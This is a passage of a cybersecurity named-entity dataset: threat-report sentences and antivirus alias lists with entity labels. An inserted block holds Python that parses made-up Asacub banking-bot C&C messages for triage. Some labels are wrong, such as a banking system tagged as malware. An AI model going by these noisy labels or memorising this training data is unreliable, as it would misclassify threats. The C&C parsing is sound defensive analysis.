not-a-virus:RiskTool.Win32.Tcpz.a Application.Hacktool.CX Trojan.Win32.SdBot.hjuf Application.Hacktool.CX TrojWare.Win32.Trojan.TCPZ.~A Rootkit:W32/Tcpz.A Tool.TcpZ Backdoor.IRCBot.Win32.17564 Backdoor.Win32.IRCBot W32/Spybot.XPIF-6513 W32.Hack.Tool Application.Hacktool.CX Worm.AutoRun/Variant not-a-virus:RiskTool.Win32.Tcpz.a HackTool:WinNT/Tcpz.A Trojan/Win32.Rootkit.C53179 Rootkit.Win32.Drucker Hacktool/Tcpz.A HackTool.Tcpz!rBSvpdUKEZI W32/Tcpz.A!tr Win32/Worm.AutoRun.750", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_006629", "source": "cyner2_train"}} {"text": "This report records the analysis and tracing process of the entire incident.", "spans": {}, "info": {"id": "cyner2_train_006630", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Win32.Scar!O Trojan.Scar Troj.W32.Scar.toQM Win32.Trojan.VB.ac WORM_OTORUN.SM0 Trojan.Win32.Scar.lpco Trojan.Win32.Scar.crgjex TrojWare.Win32.WBNA.THR Trojan.MulDrop3.10901 WORM_OTORUN.SM0 BehavesLike.Win32.VBObfus.lt Worm.Win32.VB Worm/WBNA.hgwu Trojan/Win32.Scar Win32.Troj.Scar.fw.kcloud Trojan.Symmi.DFA6A Trojan.Win32.Scar.lpco Trojan:Win32/Tookibe.B!bit HEUR/Fakon.mwf TScope.Trojan.VB Trj/GdSda.A Win32/VB.OGG Win32.Trojan.Scar.Wqms W32/VB.QHS!tr Win32/Trojan.e82", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006631", "source": "cyner2_train"}} {"text": "Casinos and resort hotels are the most recent victims of an attack that used RawPOS, an old POS malware, to steal customer data.", "spans": {"ORGANIZATION: Casinos": [[0, 7]], "ORGANIZATION: resort hotels": [[12, 25]], "MALWARE: RawPOS,": [[77, 84]], "MALWARE: POS malware,": [[92, 104]]}, "info": {"id": "cyner2_train_006633", "source": "cyner2_train"}} {"text": "Since mid-July 2015, I've noticed an increase in malicious spam malspam caught by my employer's spam filters with java archive .jar file attachments.", "spans": {}, "info": {"id": "cyner2_train_006636", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Staget.bz W32/Trojan2.NIBK Trojan.Startpage W32/Staqet.B Win32.TRCrypt.Fkm Win.Trojan.Staget-7 Trojan.Win32.Staget.bz Trojan.Staget!Y7ZdgRV9k0Q TrojanBanker.Banker.tx TrojanDownloader:Win32/Kotibu.A Trojan/Win32.VB W32/Trojan2.NIBK Trojan.Staget.bz Trojan.Startpage!rem Win32/VB.PBM Trojan.Kotibu!447E Trojan.Win32.Staget W32/VB.ABBL!tr.dldr Trj/StartPage.DAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006638", "source": "cyner2_train"}} 
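The Smaps/Asacub record earlier in this file quotes three decrypted C&C messages: the bot's registration request (an "info" string of comma-separated device fields), the server's task list ("sent&&&" entries that make the victim send SMS to a premium or banking number), and the bot's upload of an intercepted SMS with the body base64-encoded in "text". The block below is an added example, not dataset content and not the malware authors' or any vendor's code: it parses constructed messages that follow the field names shown in that record (the identifiers, phone numbers and SMS text are made up, and the mapping of "sent&&&" to "send SMS" is an assumption drawn from the quoted commands), so an analyst can turn captured traffic into structured fields for triage.

```python
"""Parse decrypted Asacub/Smaps-style C&C messages.

All three sample messages are constructed for illustration; the field names
("id", "type", "info", "command", "params", "to", "body", "timestamp",
"data", "text", "number") follow the decrypted traffic quoted in the dataset
record, but every value is made up.
"""
import base64
import json

# Constructed registration request: the bot reports device identifiers.
REGISTRATION = json.dumps({
    "id": "11111111-2222-4333-8444-555555555555",
    "type": "get",
    "info": "imei:123456789012345, country : PL, cell : ExampleTel, "
            "android:4.2.2, model : GT-N5100, phonenumber : +48000000000, "
            "sim:0000000000000000000f, app : null, ver:5.0.2",
})

# Constructed server response: two "sent&&&" tasks (send an SMS from the victim).
COMMANDS = json.dumps([
    {"command": "sent&&&", "params": {
        "to": "+70000000000",
        "body": "\u0410\u0412\u0422\u041e\u041f\u041b\u0410\u0422\u0415\u0416 1000 50",
        "timestamp": "1452272572"}},
    {"command": "sent&&&", "params": {
        "to": "+70000000000", "body": "BALANCE", "timestamp": "1452272573"}},
])

# Constructed upload of an intercepted SMS; "text" carries the base64 body.
FORWARDED_SMS = json.dumps({
    "data": "2015:10:14_02:41:15",
    "id": "11111111-2222-4333-8444-555555555555",
    "text": base64.b64encode("Your one-time code is 4711".encode()).decode(),
    "number": "1790",
    "type": "load",
})


def parse_registration(raw: str) -> dict:
    """Split the comma-separated "info" string into a key/value dict.

    The quoted traffic mixes "key:value" and "key : value", so split each
    item on its first colon and strip whitespace on both sides.
    """
    msg = json.loads(raw)
    fields = {}
    for item in msg["info"].split(","):
        key, _, value = item.partition(":")
        fields[key.strip()] = value.strip()
    fields["bot_id"] = msg["id"]
    return fields


def parse_commands(raw: str) -> list:
    """Return one task record per server command.

    The verb table is an assumption: "sent&&&" is the only verb in the quoted
    traffic, and its parameters (to/body) show it sends an SMS from the device.
    """
    verbs = {"sent&&&": "send_sms"}
    tasks = []
    for entry in json.loads(raw):
        params = entry.get("params", {})
        tasks.append({
            "action": verbs.get(entry["command"], "unknown:" + entry["command"]),
            "to": params.get("to", ""),
            "body": params.get("body", ""),
            "timestamp": params.get("timestamp", ""),
        })
    return tasks


def decode_forwarded_sms(raw: str) -> dict:
    """Decode the base64 "text" field of an intercepted-SMS upload ("type": "load")."""
    msg = json.loads(raw)
    if msg.get("type") != "load":
        raise ValueError("not an SMS upload message")
    return {
        "bot_id": msg["id"],
        "sender": msg["number"],
        "received": msg["data"],
        "text": base64.b64decode(msg["text"]).decode("utf-8", errors="replace"),
    }


if __name__ == "__main__":
    print(parse_registration(REGISTRATION))
    for task in parse_commands(COMMANDS):
        print(task)
    print(decode_forwarded_sms(FORWARDED_SMS))
```

In practice the registration fields (IMEI, SIM serial, phone number) and the "to" numbers in the task list are the values worth extracting into indicators, and the decoded "text" of upload messages shows which SMS (for example one-time banking codes) the bot has already leaked.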
{"text": "In total, it appears this threat may have impacted users from 18 countries including China, France, Russia, Japan, United Kingdom, United States, Canada, Germany, Australia, Israel, Italy, Spain, Singapore, and South Korea.", "spans": {}, "info": {"id": "cyner2_train_006640", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.DownLoad1.dddutq TrojWare.Win32.Downloader.Delf.frgf Trojan.DownLoad1.22694 Downloader.Delf.Win32.47996 BehavesLike.Win32.Dropper.bm Trojan-Dropper.Delf TrojanDownloader:Win32/Parkchicers.C Trojan.Graftor.D35402", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006641", "source": "cyner2_train"}} {"text": "They are interested in users of remote banking systems RBS, mainly in Russia and neighbouring countries.", "spans": {"MALWARE: remote banking systems RBS,": [[32, 59]]}, "info": {"id": "cyner2_train_006642", "source": "cyner2_train"}} {"text": "This blog post describes an attack campaign where NIC National Informatics Centre Cyber Security themed spear phishing email was used to possibly target Indian government organizations.", "spans": {"THREAT_ACTOR: attack campaign": [[28, 43]], "ORGANIZATION: NIC National Informatics Centre Cyber Security": [[50, 96]], "ORGANIZATION: Indian government organizations.": [[153, 185]]}, "info": {"id": "cyner2_train_006643", "source": "cyner2_train"}} {"text": "Instead of the normal modus operandi phishing attacks or drive-by downloads that lead to automatic execution of ransomware, the attackers gained persistent access to the victim's network through vulnerability exploitation and spread their access to any connected systems that they could.", "spans": {"MALWARE: ransomware,": [[112, 123]], "THREAT_ACTOR: attackers": [[128, 137]], "VULNERABILITY: vulnerability exploitation": [[195, 221]], "VULNERABILITY: connected systems": [[253, 270]]}, "info": {"id": "cyner2_train_006645", "source": "cyner2_train"}} {"text": "Duuzer is a well-designed threat 
that gives attackers remote access to the compromised computer, downloads additional files, and steals data.", "spans": {"MALWARE: Duuzer": [[0, 6]], "MALWARE: threat": [[26, 32]], "THREAT_ACTOR: attackers": [[44, 53]], "MALWARE: remote access": [[54, 67]], "SYSTEM: compromised computer,": [[75, 96]]}, "info": {"id": "cyner2_train_006648", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.PePatch.Win32.12525 Win32.Trojan.WisdomEyes.16070401.9500.9959 TROJ_PINCAV.SME Trojan.Win32.Pincav.bbbvr Trojan.Packed.149 TROJ_PINCAV.SME BehavesLike.Win32.VirRansom.cc Worm/Kapucen.ce TrojanDropper:Win32/Bablo.B Worm/Win32.Drefir.R30526 Trojan.DR.Bablo!ESXrt1Se74g Trojan-Dropper.Win32.Bablo W32/Packcav.PLK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006649", "source": "cyner2_train"}} {"text": "It is notable that NetWire was also used as a payload in that campaign.", "spans": {"MALWARE: NetWire": [[19, 26]], "MALWARE: payload": [[46, 53]], "THREAT_ACTOR: campaign.": [[62, 71]]}, "info": {"id": "cyner2_train_006650", "source": "cyner2_train"}} {"text": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "spans": {"VULNERABILITY: Zero Day": [[22, 30]], "MALWARE: FINSPY Espionage Malware": [[45, 69]], "MALWARE: LATENTBOT Cyber Crime Malware": [[74, 103]]}, "info": {"id": "cyner2_train_006652", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.WinSecND.Trojan Trojan.Win32.Winsecsrv.h Trojan.Win32.Winsecsrv.ebicpl TrojWare.Win32.Winsecsrv.B Trojan.Win32.Winsecsrv Trojan.Winsecsrv.ll TR/Taranis.2428 Trojan/Win32.Winsecsrv.h Trojan:Win32/Winexert.C!bit Trojan.Winsecsrv.1 Trojan.Win32.Winsecsrv.h Trojan/Win32.Dynamer.R176993 Win32.Trojan.Winsecsrv.Wwoi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006653", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D48EFA Trojan.DownLoader25.1955 
W32/Trojan.HNMY-5442 TrojanSpy:MSIL/Hoetou.AC Trj/GdSda.A Win32/Trojan.efe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006654", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojWare.Win32.Hadoc.AS BehavesLike.Win32.Dropper.dh Trojan.Win32.Rimecud TrojanSpy.AutoHK.a Trojan:Win32/Hadoc.A Trojan/Win32.Asprox.R130565 TrojanSpy.AutoHK Win32/Spy.AHK.E Win32/Trojan.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006655", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.VBCloneAATTc.Worm Trojan.VBClone.S500460 Trojan/VBClone.b Win32.Adware.Kryptik.h Trojan.Dropper Trojan.Win32.VB.cuvt Trojan.Win32.VB.dwthyt TrojWare.Win32.VBClone.CUV Trojan.VbCrypt.250 BehavesLike.Win32.VBObfus.qz Trojan.Crypt Trojan/VB.czdk Trojan/Win32.VB.cuvt Troj.W32.VB.tnqI Trojan.Win32.VB.cuvt TScope.Trojan.VB Win32/VBClone.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006656", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Small.15973 Win32.Trojan.WisdomEyes.16070401.9500.9775 Trojan.Dropper TROJ_MICROJOIN.W Trojan.Win32.Small.dpzper TrojWare.Win32.TrojanProxy.Puma.jsjk Trojan.Celln TROJ_MICROJOIN.W Trojan-Proxy.Win32.Puma Trojan:Win32/Ditul.B Trojan.Heur.RP.ciWfayCj9ogb Trojan/Win32.Xema.C32762", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006657", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Iterign.B3 Trojan.Win32.FAUL.exlexh Packed:MSIL/SmartIL.A BehavesLike.Win32.Trojan.dc TR/Dropper.MSIL.hxupg Trojan.Razy.D1E910 TrojanDownloader:MSIL/Iterign.B Trojan/Win32.ZBot.R139607 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006660", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Disabler!O WORM_DISABLER.SM Win32.Trojan.WisdomEyes.16070401.9500.9981 W32.Glupzy.A WORM_DISABLER.SM Win.Trojan.Disabler-3 
Trojan.Win32.Disabler.i Trojan.Win32.Disabler.beace TrojWare.Win32.Disabler.~A Trojan.Flashy BehavesLike.Win32.Downloader.qz Trojan/Win32.Disabler Troj.W32.Disabler.tnvR Trojan.Win32.Disabler.i Worm/Win32.IRCBot.R53504 Trojan.Disabler Win32/Disabler.I Trj/Flashy.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006661", "source": "cyner2_train"}} {"text": "In order to support network defenders,Fidelis Cybersecurity is offering a new, free data feed of verified indicators to support thedetection and mitigation of Pushdo.", "spans": {"ORGANIZATION: defenders,Fidelis Cybersecurity": [[28, 59]], "MALWARE: Pushdo.": [[159, 166]]}, "info": {"id": "cyner2_train_006662", "source": "cyner2_train"}} {"text": "The sample discussed was found during an incident response engagement in March 2017.", "spans": {}, "info": {"id": "cyner2_train_006663", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Lowzones.A6 Trojan.Zzinfor.1 Trojan.Win32.Dwn.dndeiz TrojWare.Win32.Zzinfor.KQ Trojan.DownLoader12.14740 Trojan.Win32.Spy Adware.Zzinfor/Variant Dropper/Win32.Injector.C189960", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006665", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.ZER Troj.Pws.Zer!c Trojan.PWS.ZER Win32.Trojan.WisdomEyes.16070401.9500.9954 Trojan.Bitterbug Trojan.PWS.ZER Trojan.PWS.ZER Trojan.PWS.ZER BehavesLike.Win32.Dropper.ch TR/PSW.ZER Backdoor:Win32/Saluchtra.B!dha Spyware.Infostealer.FakeMS Win32.Trojan.Psw.Liqs Trojan.Bitterbug! 
Trojan.Win32.Bitterbug Trojan.PWS.ZER", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006666", "source": "cyner2_train"}} {"text": "One would think that this would result in widespread use, but instead it has only been found in limited areas.", "spans": {}, "info": {"id": "cyner2_train_006667", "source": "cyner2_train"}} {"text": "This malvertising attack preyed on visitors to sketchy websites offering anything from torrents of copyrighted movies, live streams of the latest flicks, or pirated software.", "spans": {}, "info": {"id": "cyner2_train_006669", "source": "cyner2_train"}} {"text": "Very active, we can now see ~ 50k live scanner IPs daily.", "spans": {}, "info": {"id": "cyner2_train_006670", "source": "cyner2_train"}} {"text": "Android ransomware that claims it has detected forbidden pornographic pictures on your device, says it has reported it to the FBI and asks you to pay a fine of $500.", "spans": {"MALWARE: Android ransomware": [[0, 18]], "ORGANIZATION: FBI": [[126, 129]]}, "info": {"id": "cyner2_train_006671", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.Gepys.A Trojan.Kryptik.Win32.524542 Trojan/Kryptik.banx Win32.Trojan.Kryptik.eg Trojan.Win32.Redirect.ctxvfh TrojWare.Win32.Kryptik.BANN Trojan.Redirect.147 Trojan/ShipUp.km Trojan/Win32.Unknown Trojan:Win32/Gepys.A Trojan.Zusy.D404B9 Trojan/Win32.Shipup.R65212 Trojan-Downloader.Win32.Dofoil", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006674", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.BCC5 W32.Virut.G Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Foreign-502 Trojan.DownLoader11.60294 BehavesLike.Win32.Sality.cc Win32.Virut.eb.368640 Trojan/Win32.Foreign.R131573 Trojan-Ransom.Win32.Foreign", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006677", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Strictor.D2148 
Win32.Trojan.WisdomEyes.16070401.9500.9567 Trojan-Downloader.Win32.Perkesh HackTool[VirTool]/Win32.Unknown", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006681", "source": "cyner2_train"}} {"text": "The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware.", "spans": {"MALWARE: The exploit": [[0, 11]], "MALWARE: payload": [[76, 83]], "MALWARE: FinSpy malware.": [[110, 125]]}, "info": {"id": "cyner2_train_006685", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DomytnxASAAAC.Trojan Trojan.Locky.Win32.658 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.KGRA-2902 Ransom_HPLOCKY.SM4 Trojan-Ransom.Win32.Locky.aoc Trojan.Win32.Encoder.eemdlz Trojan.Win32.Locky.288947 Troj.Ransom.W32.Locky!c Trojan.Encoder.3976 Ransom_HPLOCKY.SM4 BehavesLike.Win32.MultiPlug.cc Trojan.Locky.aqx Trojan[Ransom]/Win32.Locky Trojan.Mikey.DC99C Trojan-Ransom.Win32.Locky.aoc TrojanDownloader:Win32/Terdot.A Trojan/Win32.Locky.C1503881 Trojan-Ransom.Locky Trj/CI.A W32/Bebloh.K!tr Win32/Trojan.Ransom.2d2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006686", "source": "cyner2_train"}} {"text": "MalwareBytes have been monitoring a malvertising campaign very closely as it really soared during the past week.", "spans": {"ORGANIZATION: MalwareBytes": [[0, 12]], "THREAT_ACTOR: malvertising campaign": [[36, 57]]}, "info": {"id": "cyner2_train_006687", "source": "cyner2_train"}} {"text": "With this information, an attacker can access a user's Google account data like Google Play, Google Photos, Gmail, Google Drive, and G Suite.", "spans": {"THREAT_ACTOR: attacker": [[26, 34]], "SYSTEM: Google account data": [[55, 74]], "SYSTEM: Google Play, Google Photos, Gmail, Google Drive,": [[80, 128]], "SYSTEM: G Suite.": [[133, 141]]}, "info": {"id": "cyner2_train_006688", "source": "cyner2_train"}} {"text": "A backdoor also known as: VBA/PowerShell.A 
Win.Trojan.PowerShell-8 Trojan.Ole2.Vbs-heuristic.druvzi TrojanDownloader:O97M/Poseket.A HEUR.VBA.Trojan.e heur.macro.powershell.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006689", "source": "cyner2_train"}} {"text": "A backdoor also known as: TR/Spammer.Z Trojan.Win32.Spammer.BZ Trojan.SpamTool SpamTool.KEM Trj/CI.A Win32/Trojan.Spammer.4de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006690", "source": "cyner2_train"}} {"text": "The Executive Yuan Council evaluates statutory and budgetary bills and bills concerning martial law, amnesty, declaration of war, conclusion of peace and treaties, and other important affairs.", "spans": {"ORGANIZATION: The Executive Yuan Council": [[0, 26]]}, "info": {"id": "cyner2_train_006692", "source": "cyner2_train"}} {"text": "Recently, we've seen information indicating that the scope of targets can be wider and is no longer limited to the entertainment business.", "spans": {}, "info": {"id": "cyner2_train_006694", "source": "cyner2_train"}} {"text": "This blog will discuss and uncover additional details regarding a recent campaign targeting entities in the Middle East.", "spans": {"THREAT_ACTOR: campaign": [[73, 81]]}, "info": {"id": "cyner2_train_006695", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Inject!QFG7kQRUHDk Trojan.VBInject!4947 Malware_fam.NB Skodna.GameHack.CXD Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006698", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FOverND.PE Virus.Win32.Sality!O W32.Sivis.A3 Backdoor.Poison.Win32.87654 Trojan/Kryptik.gace W32.Suviapen Packed.Win32.Krap.jc Trojan.Win32.Kespo.evacni Win32.HLLP.Kespo.4 BehavesLike.Win32.Trojan.vh Packed.Krap.fzmh Trojan[Packed]/Win32.Krap Packed.Win32.Krap.jc Trojan-Ransom.Rokku RAT.Sakula", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006699", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Trojan.Arande.A3 Win32.Worm.VB.nr Trojan.Win32.VB.dibs Win32.Trojan.Vb.Wnwj Trojan.VB.Win32.116507 Trojan/VB.cujo W32.Heuristic.Dkvt TR/Taranis.2367 Trojan.Heur.E914A2 Trojan.Win32.VB.dibs Trojan/Win32.VBKrypt.C956342 Trojan.VB!SXP1KraqrZw Trojan.VB2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006701", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Trupto TROJ_INJECTR.BUSZ Trojan.Win32.Buzus.yhkt Trojan.Win32.Buzus.ewiofb TROJ_INJECTR.BUSZ Trojan.Win32.Crypt W32/Trojan.ALBD-0280 Trojan.Buzus.cni Trojan:Win32/Trupto.A Trojan.Win32.Buzus.yhkt Trj/CI.A Win32.Trojan.Inject.Auto", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006703", "source": "cyner2_train"}} {"text": "To distribute the Trojan, cybercriminals log in to the vulnerable devices via the SSH protocol.", "spans": {"MALWARE: Trojan,": [[18, 25]], "THREAT_ACTOR: cybercriminals": [[26, 40]], "SYSTEM: vulnerable devices": [[55, 73]]}, "info": {"id": "cyner2_train_006706", "source": "cyner2_train"}} {"text": "Proofpoint researchers originally spotted the MarsJoke ransomware in late August by trawling through our repository of unknown malware.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: MarsJoke ransomware": [[46, 65]], "MALWARE: unknown malware.": [[119, 135]]}, "info": {"id": "cyner2_train_006707", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ReplaceMiKsLT.Fam.RSF Trojan-PWS/W32.Frethoq.34461.C Trojan-GameThief.Win32.Frethoq!O TrojanPWS.Lolyda.BF5 Troj.GameThief.W32.OnLineGames.lnFT Trojan/OnLineGames.qbf TROJ_RVERSE.SMI Win32.Trojan-PSW.OLGames.i TROJ_RVERSE.SMI Win32.Trojan-Spy.Lolyda.A Trojan-GameThief.Win32.OnLineGames.ajqgf Trojan.Win32.Gamania.thvvt Trojan.Win32.A.Zbot.34461 Trojan.PWS.Gamania.36445 BehavesLike.Win32.PWSOnlineGames.nh TR/PSW.Lolyda.bfmna Trojan[GameThief]/Win32.Frethoq PWS:Win32/Lolyda.BF Trojan-GameThief.Win32.OnLineGames.ajqgf 
Trojan/Win32.OnlineGameHack.R21894 BScope.Trojan.OLGames.4521 Trojan.Zusy.DBE3 Win32/PSW.OnLineGames.QBF Trojan.PSW.Win32.GamePass.a Trojan.PWS.OnLineGames!V9usvrFPqu0 Trojan-PWS.Win32.Lolyda W32/OnLineGames.REV!tr Trojan.PSW.Win32.GameOnline.CO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006709", "source": "cyner2_train"}} {"text": "The group is known to use custom malware called Daserf, but also employs multiple commodity and custom tools, exploit vulnerabilities, and use social engineering techniques.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "MALWARE: custom malware": [[26, 40]], "MALWARE: Daserf,": [[48, 55]], "MALWARE: custom tools, exploit": [[96, 117]], "VULNERABILITY: vulnerabilities,": [[118, 134]]}, "info": {"id": "cyner2_train_006711", "source": "cyner2_train"}} {"text": "Its targets include the military organizations and governments of countries with national interests in the South China Sea, including some within the U.S. defense industrial base.", "spans": {"ORGANIZATION: military organizations": [[24, 46]], "ORGANIZATION: governments of countries": [[51, 75]]}, "info": {"id": "cyner2_train_006714", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Noancooe MSIL.Backdoor.Bladabindi.AM TR/Nanocore.dfari Trojan:MSIL/Noancooe.D!bit Trj/CI.A Worm.Win32.Ainslot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006718", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Sasfis.4023296 Trojan/Sasfis.bnyn Trojan.Strictor.DEB1C Win32.Trojan.WisdomEyes.16070401.9500.9554 Backdoor.Graybird Win.Trojan.Yobdam-4 Trojan-Dropper.Win32.Dapato.bwsw Trojan.Win32.Sasfis.diovf Trojan.MulDrop2.58470 Backdoor.Yobdam.Win32.845 BehavesLike.Win32.BadFile.wc Trojan/Buzus.awfr Trojan/Win32.Sasfis Trojan-Dropper.Win32.Dapato.bwsw Trojan/Win32.Injector.C1773 SScope.Trojan.MBRLock.2121 Trojan.Sasfis!aSW+l8me7nU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_006720", "source": "cyner2_train"}} {"text": "YOUR FILES WERE ENCRYPTED.", "spans": {}, "info": {"id": "cyner2_train_006721", "source": "cyner2_train"}} {"text": "A backdoor also known as: Infostealer.Lineage Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Nilage.XS Infostealer.Lineage Trojan-GameThief.Win32.Nilage.bdm W32.W.Bagle.kZt7 Trojan.PWS.Lineage.9841 BehavesLike.Win32.Pate.pc Trojan-PWS.Win32.Delf W32/Nilage.KWZM-6493 Trojan/PSW.Nilage.auz Trojan[GameThief]/Win32.Magania Trojan-GameThief.Win32.Nilage.bdm Trojan/Win32.OnlineGameHack.R24518 PWS-Gamania.dll Infostealer.Lineage MalwareScope.Trojan-PSW.Game.13 Trojan.PWS.Nilage!v/lUmVrQ3Ac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006722", "source": "cyner2_train"}} {"text": "According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched.", "spans": {"ORGANIZATION: X-Force research,": [[13, 30]], "MALWARE: banking Trojan": [[39, 53]], "THREAT_ACTOR: first test campaigns": [[102, 122]]}, "info": {"id": "cyner2_train_006723", "source": "cyner2_train"}} {"text": "The focus of this blog post is MiKey, a little-known and poorly detected keylogger.", "spans": {"MALWARE: MiKey,": [[31, 37]], "MALWARE: keylogger.": [[73, 83]]}, "info": {"id": "cyner2_train_006724", "source": "cyner2_train"}} {"text": "This post will use the PlugX malware as an example PlugX is well known and has had its various iterations analyzed many times, due in part to its ongoing activity and will focus on leveraging metadata from VirusTotal due to it being publicly accessible.", "spans": {"MALWARE: PlugX malware": [[23, 36]], "MALWARE: PlugX": [[51, 56]], "ORGANIZATION: VirusTotal": [[206, 216]]}, "info": {"id": "cyner2_train_006726", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.5FA3 Trojan.Glox Infostealer.Gampass Packed.Win32.MUPACK.~KW BehavesLike.Win32.Spybot.dc Trojan/Win32.ADH Trj/Pupack.A 
Win32.Trojan.Xed.Dzkj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006727", "source": "cyner2_train"}} {"text": "Maktub Locker is another ransomware that comes with a beautifully designed GUI and few interesting features.", "spans": {"MALWARE: Maktub Locker": [[0, 13]], "MALWARE: ransomware": [[25, 35]]}, "info": {"id": "cyner2_train_006730", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.CPEX-based!O Trojan.Delfinject.16926 PWS-LDPinch.a!hv Trojan.Buzus.Win32.2199 Trojan/Buzus.rrb TROJ_FAM_0001199.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9967 Win32/Lunibot.B TROJ_FAM_0001199.TOMA Win.Trojan.Buzus-2288 Packed.Win32.CPEX-based.eq Trojan.Win32.CPEXbased.bejytp Trojan.Win32.Buzus.374868 Win32.Trojan.Dovqplay.clht TrojWare.Win32.TrojanDropper.Binder.G BackDoor.Poison.61 BehavesLike.Win32.SoftPulse.tc Virus.Win32.DelfInject W32/Trojan2.CYTZ Trojan/Buzus.puv Trojan[Packed]/Win32.CPEX-based Backdoor:Win32/Mielit.A Packed.Win32.CPEX-based.eq Trojan/Win32.Xema.R44960 BScope.Binder.Buzus.er W32/Buzus.BZ.worm VirTool.DelfInject!GapcEdmyxw8 W32/Injector.fam!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006737", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.XinarilD.Trojan Trojan.Zusy.D26766 Trojan.Win32.Zusy.exkztw W32/Trojan.HJTJ-8943 Trojan/Scar.bmgw TR/Zusy.2726400 Trojan:Win64/SvcMiner.A Trojan.Win32.Z.Zusy.2726400.CY Backdoor.Bot Trj/CI.A Trojan.Scar!zCrXbtgxLOk Win32/Trojan.e88", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006738", "source": "cyner2_train"}} {"text": "In this post, we will focus on the mobile part of their operation and discuss in detail several Android and BlackBerry apps they are using.", "spans": {"THREAT_ACTOR: operation": [[56, 65]], "SYSTEM: Android": [[96, 103]], "SYSTEM: BlackBerry apps": [[108, 123]]}, "info": {"id": "cyner2_train_006739", "source": "cyner2_train"}} {"text": "Unit 42 researchers identified a 
